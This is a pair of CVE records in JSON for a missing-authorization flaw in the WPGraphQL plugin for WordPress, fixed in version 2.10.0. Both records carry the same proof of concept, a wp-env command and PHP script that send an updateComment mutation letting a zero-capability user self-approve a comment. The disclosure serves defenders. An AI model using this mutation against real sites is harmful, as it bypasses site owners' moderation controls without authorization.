{"dataType": "CVE_RECORD", "dataVersion": "5.2", "cveMetadata": {"cveId": "CVE-2026-33290", "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "state": "PUBLISHED", "assignerShortName": "GitHub_M", "dateReserved": "2026-03-18T18:55:47.426Z", "datePublished": "2026-03-23T23:58:57.345Z", "dateUpdated": "2026-03-23T23:58:57.345Z"}, "containers": {"cna": {"title": "WPGraphQL Repo's updateComment allows low-privileged authenticated users to change comment moderation status (comment_approved) without moderate_comments permission", "problemTypes": [{"descriptions": [{"cweId": "CWE-862", "lang": "en", "description": "CWE-862: Missing Authorization", "type": "CWE"}]}], "metrics": [{"cvssV3_1": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1"}}], "references": [{"name": "https://github.com/wp-graphql/wp-graphql/security/advisories/GHSA-9hc3-mh5h-4fgh", "tags": ["x_refsource_CONFIRM"], "url": "https://github.com/wp-graphql/wp-graphql/security/advisories/GHSA-9hc3-mh5h-4fgh"}, {"name": "https://github.com/wp-graphql/wp-graphql/releases/tag/wp-graphql%2Fv2.10.0", "tags": ["x_refsource_MISC"], "url": "https://github.com/wp-graphql/wp-graphql/releases/tag/wp-graphql%2Fv2.10.0"}], "affected": [{"vendor": "wp-graphql", "product": "wp-graphql", "versions": [{"version": "< 2.10.0", "status": "affected"}]}], "providerMetadata": {"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa", "shortName": "GitHub_M", "dateUpdated": "2026-03-23T23:58:57.345Z"}, "descriptions": [{"lang": "en", "value": "WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.10.0, an authorization flaw in updateComment allows an authenticated low-privileged user (including a custom role with zero capabilities) to change moderation status of their own comment (for example to APPROVE) without the moderate_comments capability. This can bypass moderation workflows and let untrusted users self-approve content. Version 2.10.0 contains a patch.\n\n### Details\n\nIn WPGraphQL 2.9.1 (tested), authorization for updateComment is owner-based, not field-based:\n\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 allows moderators.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:99:99 also allows the comment owner, even if they lack moderation capability.\n- plugins/wp-graphql/src/Data/CommentMutation.php:94:94 maps GraphQL input status directly to WordPress comment_approved.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120 persists that value via wp_update_comment.\n- plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 exposes moderation states (APPROVE, HOLD, SPAM, TRASH).\n\nThis means a non-moderator owner can submit status during update and transition moderation state.\n\n### PoC\n\nTested in local wp-env (Docker) with WPGraphQL 2.9.1.\n\n1. Start environment:\n\n npm install\n npm run wp-env start\n\n2. Run this PoC:\n\n```\n npm run wp-env run cli -- wp eval '\n add_role(\"no_caps\",\"No Caps\",[]);\n $user_id = username_exists(\"poc_nocaps\");\n if ( ! $user_id ) {\n $user_id = wp_create_user(\"poc_nocaps\",\"Passw0rd!\",\"poc_nocaps@example.com\");\n }\n $user = get_user_by(\"id\",$user_id);\n $user->set_role(\"no_caps\");\n\n $post_id = wp_insert_post([\n \"post_title\" => \"PoC post\",\n \"post_status\" => \"publish\",\n \"post_type\" => \"post\",\n \"comment_status\" => \"open\",\n ]);\n\n $comment_id = wp_insert_comment([\n \"comment_post_ID\" => $post_id,\n \"comment_content\" => \"pending comment\",\n \"user_id\" => $user_id,\n \"comment_author\" => $user->display_name,\n \"comment_author_email\" => $user->user_email,\n \"comment_approved\" => \"0\",\n ]);\n\n wp_set_current_user($user_id);\n\n $result = graphql([\n \"query\" => \"mutation U(\\$id:ID!){ updateComment(input:{id:\\$id,status:APPROVE}){ success comment{ databaseId status } } }\",\n \"variables\" => [ \"id\" => (string)$comment_id ],\n ]);\n\n echo wp_json_encode([\n \"role_caps\" => array_keys(array_filter((array)$user->allcaps)),\n \"status\" => $result[\"data\"][\"updateComment\"][\"comment\"][\"status\"] ?? null,\n \"db_comment_approved\" => get_comment($comment_id)->comment_approved ?? null,\n \"comment_id\" => $comment_id\n ]);\n '\n```\n\n3. Observe result:\n\n- role_caps is empty (or no moderate_comments)\n- mutation returns status: APPROVE\n- DB value becomes comment_approved = 1\n\n### Impact\n\nThis is an authorization bypass / broken access control issue in comment moderation state transitions. Any deployment using WPGraphQL comment mutations where low-privileged users can make comments is impacted. Moderation policy can be bypassed by self-approving content."}], "source": {"advisory": "GHSA-9hc3-mh5h-4fgh", "discovery": "UNKNOWN"}}}}

{}

{"cveTags": [], "descriptions": [{"lang": "en", "value": "WPGraphQL provides a GraphQL API for WordPress sites. Prior to version 2.10.0, an authorization flaw in updateComment allows an authenticated low-privileged user (including a custom role with zero capabilities) to change moderation status of their own comment (for example to APPROVE) without the moderate_comments capability. This can bypass moderation workflows and let untrusted users self-approve content. Version 2.10.0 contains a patch.\n\n### Details\n\nIn WPGraphQL 2.9.1 (tested), authorization for updateComment is owner-based, not field-based:\n\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:92 allows moderators.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:99:99 also allows the comment owner, even if they lack moderation capability.\n- plugins/wp-graphql/src/Data/CommentMutation.php:94:94 maps GraphQL input status directly to WordPress comment_approved.\n- plugins/wp-graphql/src/Mutation/CommentUpdate.php:120:120 persists that value via wp_update_comment.\n- plugins/wp-graphql/src/Type/Enum/CommentStatusEnum.php:22:22 exposes moderation states (APPROVE, HOLD, SPAM, TRASH).\n\nThis means a non-moderator owner can submit status during update and transition moderation state.\n\n### PoC\n\nTested in local wp-env (Docker) with WPGraphQL 2.9.1.\n\n1. Start environment:\n\n npm install\n npm run wp-env start\n\n2. Run this PoC:\n\n```\n npm run wp-env run cli -- wp eval '\n add_role(\"no_caps\",\"No Caps\",[]);\n $user_id = username_exists(\"poc_nocaps\");\n if ( ! $user_id ) {\n $user_id = wp_create_user(\"poc_nocaps\",\"Passw0rd!\",\"poc_nocaps@example.com\");\n }\n $user = get_user_by(\"id\",$user_id);\n $user->set_role(\"no_caps\");\n\n $post_id = wp_insert_post([\n \"post_title\" => \"PoC post\",\n \"post_status\" => \"publish\",\n \"post_type\" => \"post\",\n \"comment_status\" => \"open\",\n ]);\n\n $comment_id = wp_insert_comment([\n \"comment_post_ID\" => $post_id,\n \"comment_content\" => \"pending comment\",\n \"user_id\" => $user_id,\n \"comment_author\" => $user->display_name,\n \"comment_author_email\" => $user->user_email,\n \"comment_approved\" => \"0\",\n ]);\n\n wp_set_current_user($user_id);\n\n $result = graphql([\n \"query\" => \"mutation U(\\$id:ID!){ updateComment(input:{id:\\$id,status:APPROVE}){ success comment{ databaseId status } } }\",\n \"variables\" => [ \"id\" => (string)$comment_id ],\n ]);\n\n echo wp_json_encode([\n \"role_caps\" => array_keys(array_filter((array)$user->allcaps)),\n \"status\" => $result[\"data\"][\"updateComment\"][\"comment\"][\"status\"] ?? null,\n \"db_comment_approved\" => get_comment($comment_id)->comment_approved ?? null,\n \"comment_id\" => $comment_id\n ]);\n '\n```\n\n3. Observe result:\n\n- role_caps is empty (or no moderate_comments)\n- mutation returns status: APPROVE\n- DB value becomes comment_approved = 1\n\n### Impact\n\nThis is an authorization bypass / broken access control issue in comment moderation state transitions. Any deployment using WPGraphQL comment mutations where low-privileged users can make comments is impacted. Moderation policy can be bypassed by self-approving content."}], "id": "CVE-2026-33290", "lastModified": "2026-03-24T01:17:01.677", "metrics": {"cvssMetricV31": [{"cvssData": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "security-advisories@github.com", "type": "Secondary"}]}, "published": "2026-03-24T01:17:01.677", "references": [{"source": "security-advisories@github.com", "url": "https://github.com/wp-graphql/wp-graphql/releases/tag/wp-graphql%2Fv2.10.0"}, {"source": "security-advisories@github.com", "url": "https://github.com/wp-graphql/wp-graphql/security/advisories/GHSA-9hc3-mh5h-4fgh"}], "sourceIdentifier": "security-advisories@github.com", "vulnStatus": "Received", "weaknesses": [{"description": [{"lang": "en", "value": "CWE-862"}], "source": "security-advisories@github.com", "type": "Primary"}]}

{}

{}